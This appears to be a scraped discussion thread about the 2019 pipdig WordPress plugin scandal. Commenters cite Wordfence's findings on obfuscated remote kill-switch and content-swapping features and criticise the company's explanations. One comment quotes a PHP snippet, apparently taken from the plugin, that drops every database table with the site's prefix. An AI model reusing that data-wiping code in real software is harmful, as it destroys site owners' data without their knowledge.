https://twitter.com/nickstadb/status/1112479746972151808
pipdig is a goldmine.
While the call to host switch is malicious, almost every developer in WordPress world will agree BlueHost, and their parent company with all their 50+ hosting companies, are utter garbage. The only reason they exist is because they have hired an army of bloggers and pay them affiliate income of $65 / signup.
As far as disabling Endurance Cache goes, it is completely legitimate. It's a plugin forced upon BlueHost users, without being told so, and is a "must-use" plugin that most users will never check (and can't be completely disabled from WordPress admin).
https://www.wordfence.com/blog/2019/03/peculiar-php-present-...
As for hosting providers: GoDaddy, BlueHost, etc - yes, they're all bad. But that doesn't justify moves like these.
Serious question though, on the technical part: WP needs an advanced-cache.php file, which needs to be in wp-content in order for the cache to work; this will list as dropin. Are you sure the endurance cache is MU and not dropin? (Genuine question).
I've been trying to find non-Amazon or non-Google hosting options, wanting to spend my money elsewhere. Is this a waste of time or effort? I imagine that cloud hosting with Google would be less restrictive, though more complicated to setup.
Thanks for any ideas
foreach ($tables as $table) {
$wpdb->query("DROP TABLE $table");
} global $wpdb;
$prefix = str_replace('_', '\_', $wpdb->prefix);
$tables = $wpdb->get_col("SHOW TABLES LIKE '{$prefix}%'");
foreach ($tables as $table) {
$wpdb->query("DROP TABLE $table");
}
The WordPress of 2007, which I loved very much, has nothing to do with this monster of 2019.
It really is a shame, because frankly speaking - most of these plugins are utter trash anyway.
Then you get ones that can't survive minor wordpress upgrades, or are full of security holes.
The worst is when you have a highly motivated person who throws a ton of them together to buid a website, and then it languishes and becomes out of date, and any upgrading you do will start culling plugins from their baby.
Same stories emanate from the Google Play marketplace, and to a lesser extent the highly curated Apple app store marketplace. How is WordPress any different?
> you have to wade through a minefield of freemium plugins
Just like every other app store.
> for code you won't have any freedom with
Unlike smartphone apps, or apps for my PC I can and do inspect the source code of any WordPress plugin or theme.
> I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed
I'd feel the same way about platforms I've only been exposed to a few times as well.
This has blown up on Twitter. Our team has stayed out of the online debate mostly other than answering questions. We're trying to just focus on the data here.
They took their public repo offline, but we mirrored it before they did that. It contradicts some claims they're making re timing. We're publishing a timeline tomorrow and are recording our weekly podcast tonight instead of tomorrow as per normal because of this insanity. We'll break it down on the show.
I guess what really jumps out at me here is how they're trying to gaslight the thing.
When we contacted them before publishing via email, they explained that someone had been pirating their software so this was a countermeasure. (quote is in the Wordfence post above) I guess the idea was that they would destroy sites using pirated licenses. Then they backpedalled that later on after this went viral.
you would think there would different levels of user accounts and perhaps two level authentication for any change regardless of how it is invoked
Edit: Wow, peoples' responses on Twitter are even more delusional. Wtf?
I find this so baffling. It's like being shown the bodies of a serial killer's victims, and publicly stating "oh, but he never murdered me, so why are you all complaining?"
If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.
1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.
2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.
3. Altering user's site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.
4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).
Oh and they deleted repos apparently, gotta hide the evidence
"But all my customers love and trust me!" == "I'm just an above-average con man."
"But I was just doing this to support them without bothering them!" == "I'm clearly not ready to take responsibility and fess up to anything because I thought my deceptively named functions would fool everybody (and still do)."
"But my girlfriend and I love cat memes!" == "Please, for the love of god, can we forget about all this and talk about cat memes instead?" [I honestly have no clue what he was trying to get at in the first six paragraphs...]
They were probably obfuscating those functions to hide them from the people selling their themes. Sounds like they were also disabling this plugin as well.
But they definitely went about things the wrong way, including functions like that and obfuscating them is definitely not the right way to do things.
I think a simple, we're sorry we had included these functions in this manner to combat the company stealing our themes last year. We understand this was wrong and a fresh clean version of the plugin will be out this week.
We will do things the right way from now on, you can trust us and we welcome audits of all our code.
Some of this might be explainable in this fashion, but not all.
https://www.wordfence.com/blog/2019/03/peculiar-php-present-...
> Firstly, the plugin includes a content filter that automatically replaces references to Blogerize, a service which claims to be a beginner’s blogging course, with references to Pipdig’s own services.
> Phil you need to stop with the lies. Not only do you outright lie about having the ability to kill sites with your plugin, you state that this was implemented in response to a security breach you experienced in July 2018. The code was implemented in November 2017.
https://twitter.com/nickstadb/status/1112444919409446912
Unfortunately, pipdig wiped and recreated the repo an hour ago, so that history is no longer available there at least.
It's easy enough these days to blame things on journalists and "fake news".
One of their competitors should consider filing a complaint with the relevant authorities, so this gets formally investigated.
And original link: https://web.archive.org/web/20190401004514/https://www.jemja...
I'm getting errors when using a VPN:
> The firewall on this server is blocking your connection.
Further, they peddled this into who knows how many themes they sold and never thought they'd get caught?
"Extend your WordPress experience with 54,886 plugins."
And those are only the ones on wp.org itself; the "premium" themes are in the tens thousands as well. It's not simple to catch these.
a) Wordpress, which is a swamp filled with mines in the form of plugins b) Wix, which forces hosting and bad HTML on you
Basically I want a Wordpress-like frontend + the rich template ecosystem and for it to spit out static HTML files.